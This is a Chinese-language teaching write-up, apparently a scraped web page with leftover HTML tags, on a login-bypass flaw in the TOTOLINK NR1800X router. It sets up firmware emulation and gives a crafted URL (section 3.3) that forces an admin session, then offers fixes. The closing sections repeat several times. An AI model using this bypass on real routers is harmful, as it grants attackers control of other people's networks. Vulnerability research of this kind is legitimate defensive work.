TOTOLINK_NR1800X 绕过登录漏洞分析教学文档<\/h1>

1. 漏洞概述<\/h2>
本教学文档详细分析TOTOLINK NR1800X路由器中存在的登录验证绕过漏洞，该漏洞存在于lighttpd服务中，允许攻击者通过构造特定URL绕过认证机制直接访问后台管理界面。<\/p>

2. 环境准备<\/h2>

2.1 固件获取<\/h3>

从官方下载固件：<\/p>

https:\/\/www.totolink.net\/home\/menu\/detail\/menu_listtpl\/download\/id\/225\/ids\/36.html
<\/code><\/pre>
2.2 固件分析环境搭建<\/h3>
用户态环境<\/h4>

使用chroot和qemu-mipsel模拟运行：<\/li>
<\/ol>
sudo chroot . .\/qemu-mipsel-static .\/usr\/sbin\/lighttpd
<\/span><\/span><\/code><\/pre>
常见问题解决：<\/li>
<\/ol>

需要指定配置文件<\/li>
创建缺失的pid文件：\/var\/run\/lighttpd.pid<\/code><\/li>
<\/ul>
系统态环境（推荐）<\/h4>

下载所需镜像：<\/li>
<\/ol>
wget https:\/\/people.debian.org\/~aurel32\/qemu\/mipsel\/debian_squeeze_mipsel_standard.qcow2
<\/span><\/span>wget https:\/\/people.debian.org\/~aurel32\/qemu\/mipsel\/vmlinux-3.2.0-4-4kc-malta
<\/span><\/span><\/code><\/pre>
网络配置：<\/li>
<\/ol>
sudo brctl addbr virbr0
<\/span><\/span>sudo ifconfig virbr0 192.168.2.1\/24 up
<\/span><\/span>sudo tunctl -t tap0
<\/span><\/span>sudo ifconfig tap0 192.168.2.11\/24 up
<\/span><\/span>sudo brctl addif virbr0 tap0
<\/span><\/span><\/code><\/pre>
启动QEMU虚拟机：<\/li>
<\/ol>
sudo qemu-system-mipsel -M malta \
<\/span><\/span><\/span><\/span>-kernel vmlinux-3.2.0-4-4kc-malta \
<\/span><\/span><\/span><\/span>-hda debian_squeeze_mipsel_standard.qcow2 \
<\/span><\/span><\/span><\/span>-append "root=\/dev\/sda1 console=tty0"<\/span> -nographic \
<\/span><\/span><\/span><\/span>-net nic -net tap,ifname=<\/span>tap0,script=<\/span>no,downscript=<\/span>no
<\/span><\/span><\/code><\/pre>
文件传输到虚拟机：<\/li>
<\/ol>
sudo scp -o HostKeyAlgorithms=<\/span>+ssh-rsa -r squashfs-root\/ root@172.26.71.12:\/root\/
<\/span><\/span><\/code><\/pre>
在虚拟机中启动环境：<\/li>
<\/ol>
chroot .\/squashfs-root\/ \/bin\/sh
<\/span><\/span><\/code><\/pre>3. 漏洞分析<\/h2>
3.1 正常登录流程分析<\/h3>

登录请求示例：<\/li>
<\/ol>
POST<\/span> \/cgi-bin\/cstecgi.cgi?action=login HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.2.12<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Content-Length:<\/span> 29<\/span>
<\/span><\/span>
<\/span><\/span>username=admin&password=55555
<\/span><\/span><\/code><\/pre>
正常响应：<\/li>
<\/ol>
HTTP<\/span>\/<\/span>1.1<\/span> 302<\/span> Found<\/span>
<\/span><\/span>Location:<\/span> http:\/\/192.168.2.12\/formLoginAuth.htm?authCode=0&userName=&goURL=login.html&action=login<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

authCode=0<\/code>表示登录失败<\/li>
userName=<\/code>为空表示未认证<\/li>
<\/ul>
3.2 关键函数分析<\/h3>

程序执行流：<\/li>
<\/ol>

请求首先由cgi-bin\/cstecgi.cgi<\/code>处理<\/li>
调用sub_42AEEC<\/code>函数（通过off_44C074<\/code>指针）<\/li>
<\/ul>

认证机制：<\/li>
<\/ol>

authCode<\/code>参数控制认证状态<\/li>
goURL<\/code>参数指定跳转页面<\/li>
userName<\/code>参数指定用户名<\/li>
<\/ul>
3.3 漏洞利用方法<\/h3>
构造以下URL可直接绕过认证：<\/p>
http:\/\/192.168.2.12\/formLoginAuth.htm?authCode=1&userName=admin&password=aaa&goURL=home.html&action=login
<\/code><\/pre>
关键参数说明：<\/p>

authCode=1<\/code>：强制设置为认证成功状态<\/li>
userName=admin<\/code>：设置管理员用户名<\/li>
goURL=home.html<\/code>：直接跳转到后台主页<\/li>
<\/ul>
4. 漏洞验证<\/h2>

直接访问构造的URL<\/li>
检查是否获得有效SESSION_ID<\/li>
验证能否访问后台管理功能<\/li>
<\/ol>
5. 修复建议<\/h2>

服务器端应严格验证authCode<\/code>参数，不应接受客户端直接设置<\/li>
实现完整的会话管理机制，不依赖URL参数进行认证<\/li>
对formLoginAuth.htm<\/code>页面增加权限验证<\/li>
<\/ol>
6. 总结<\/h2>
该漏洞源于认证机制设计缺陷，通过直接修改URL参数即可绕过认证。开发人员应避免将关键认证状态暴露给客户端控制，所有认证决策应在服务器端完成。<\/p>

TOTOLINK_NR1800X 绕过登录漏洞分析教学文档<\/h1>

1. 漏洞概述<\/h2> 本教学文档详细分析TOTOLINK NR1800X路由器中存在的登录验证绕过漏洞，该漏洞存在于lighttpd服务中，允许攻击者通过构造特定URL绕过认证机制直接访问后台管理界面。<\/p>

2. 环境准备<\/h2>

2.2 固件分析环境搭建<\/h3>

3. 漏洞分析<\/h2>

6. 总结<\/h2> 该漏洞源于认证机制设计缺陷，通过直接修改URL参数即可绕过认证。开发人员应避免将关键认证状态暴露给客户端控制，所有认证决策应在服务器端完成。<\/p>

1. 漏洞概述<\/h2>
本教学文档详细分析TOTOLINK NR1800X路由器中存在的登录验证绕过漏洞，该漏洞存在于lighttpd服务中，允许攻击者通过构造特定URL绕过认证机制直接访问后台管理界面。<\/p>

6. 总结<\/h2>
该漏洞源于认证机制设计缺陷，通过直接修改URL参数即可绕过认证。开发人员应避免将关键认证状态暴露给客户端控制，所有认证决策应在服务器端完成。<\/p>